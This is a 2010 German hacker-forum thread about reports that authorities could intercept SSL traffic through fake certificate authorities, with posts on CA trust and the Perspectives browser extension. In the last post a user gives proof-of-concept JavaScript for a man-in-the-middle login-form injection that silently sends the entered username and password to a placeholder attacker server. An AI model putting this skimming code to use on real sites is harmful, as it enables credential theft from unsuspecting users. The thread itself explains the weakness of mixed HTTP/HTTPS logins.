Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
News & Ankündigungen Aktuelle News rund ums Netz - recherchiert von unseren Usern, sowie offizielles vom Team und Ankündigungen der Moderatoren findet ihr hier.

wer traut SSL?

Diskussion: wer traut SSL? im Forum News & Ankündigungen, in der Kategorie Allgemeines; Anzeige Spannende News aus dem Land der CAs. BEsteht die Moeglichkeit, das die Feds saemtliche SSL verschluesselten Kommunikationen mitlesen koennen? ...

Antwort
Alt 26.03.10, 09:40   #1 (permalink)
Moderator
 
Registriert seit: 30.06.08
Chromatin Leistung: K 6-3Chromatin Leistung: K 6-3Chromatin Leistung: K 6-3Chromatin Leistung: K 6-3
Likes: 227
Standard wer traut SSL?

Anzeige

Spannende News aus dem Land der CAs. BEsteht die Moeglichkeit, das die Feds saemtliche SSL verschluesselten Kommunikationen mitlesen koennen?

In den USA gibt es einen Hersteller solcher spezieller Geraete, aber der "knackt" nichts

Lesen und aergern:
http://www.eff.org/deeplinks/2010/03...ments-fake-ssl

http://www.wired.com/threatlevel/201...ket-forensics/

__________________
Wenn ein Gesetz nicht gerecht ist, dann geht die Gerechtigkeit vor dem Gesetz!

Habo Blog - http://blog.hackerboard.de/
Chromatin ist offline   Mit Zitat antworten
Alt 27.03.10, 22:48   #2 (permalink)
 
Benutzerbild von Dresko
 
Registriert seit: 30.01.10
Dresko Leistung: 8086Dresko Leistung: 8086
Likes: 1
Standard

Naja, ich finde diese Meldung wenig überraschend. Jeder der sich näher mit dem Signierungsprozess von Zertifikaten beschäftigt hat, sollte schon gemerkt haben, dass sowas potentiell möglich ist.

Vielleicht findet nun aber mal ein Umdenken bei den Browser-Herstellern statt, nicht Hunderte von CA-Zertifkaten fest in die Browser zu integrieren und danach einfach alles durchzuwinken...
__________________
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning.
- Rick Cook -
Dresko ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 27.03.10, 23:29   #3 (permalink)
 
Registriert seit: 30.06.08
VierZwei Leistung: Facit NTK
Likes: 0
Standard

Es gibt für Firefox diese Erweiterung: Perspectives.

Im Prinzip fragt Firefox bei jeder neuen SSL-Verbindung, ob das Zertifikat bereits anderen Nutzern bekannt ist. So soll sichergestellt werden, dass bei selbstsignierten Zertifikaten kein einfacher mitm-Angriff möglich ist, weil keiner den Fingerprint auswendig kennt

Hilft aber nicht gegen langfristig durchgeführte Angriffe.
VierZwei ist offline   Mit Zitat antworten
Alt 28.03.10, 01:35   #4 (permalink)
 
Registriert seit: 05.10.05
Inliferty Leistung: 8086
Inliferty eine Nachricht über ICQ schicken
Likes: 5
Standard

Ich bin der Meinung von Dresko.
Es ist eigentlich nichts neues.

Unser Informatik Lehrer hat dies sogar erwähnt als wir das Thema "Verschlüsselung und Signierung" durchmachten.
Es ist aber die beste Alternative zum normalen http.

Worüber ich mir mehr sorgen mache ist die Einbindung in Web-Services:
Ein bekanntes soziales Netzwerk, dessen Name ich jetzt nicht nennen will, verfügt zum Beispiel über so eine geniale Einbindung.
Die original Seite ruft beim Login eine https-Seite auf.
Warum sollte ich auf die https-Verbindung warten, wenn ich direkt die Login-Seite manipulieren kann und so beim klicken des Login Buttons das Passwort an mich, als MITM-Angreifer, senden kann.
Von mir aus gleich ein redirect weiter an den original Server. So bemerkt der User nichts.
(Advanced: Login-Formular so bearbeiten das ein Ajax-Request an deinen Server mit dem Passwort gesendet wird und den Login normal durchführen.
Proof of Concept   

Abgeändertes Login-Formular per MITM-Angriff
Code:
<script type="text/javascript">
function ProofOfConcept()
{ 
    var Sniffer; 

    if (window.XMLHttpRequest)
    {
        // Firefox, Safari, ...
        Sniffer = new XMLHttpRequest();
    }
    else if (window.ActiveXObject)   // ActiveX version
    {
        // Internet Explorer
        Sniffer = new ActiveXObject("Microsoft.XMLHTTP");
    }

    Sniffer.onreadystatechange  = function() { };

    Sniffer.open('GET', "http://<yourserver>/sniff.php?user=" +  document.ajax.user.value + "&pass=" + document.ajax.pass.value,   true); 
    Sniffer.send(null); 
}
</script>

<FORM method="POST" name="ajax" action="https://<censored>/login.php">
    <INPUT type="text" value=""  name="user">
    <INPUT type="password" value=""  name="pass">
    <INPUT type="button" value="Submit"  ONCLICK="ProofOfConcept()">
</FORM>

Meine Meinung dazu ist entweder die Seite vollkommen mit SSL schützen oder es ganz zu lassen.
Ein Mix aus beidem ist irgendwie seltsam.

MfG
Inliferty
Inliferty ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Allgemeines » News & Ankündigungen » wer traut SSL?
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus



1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61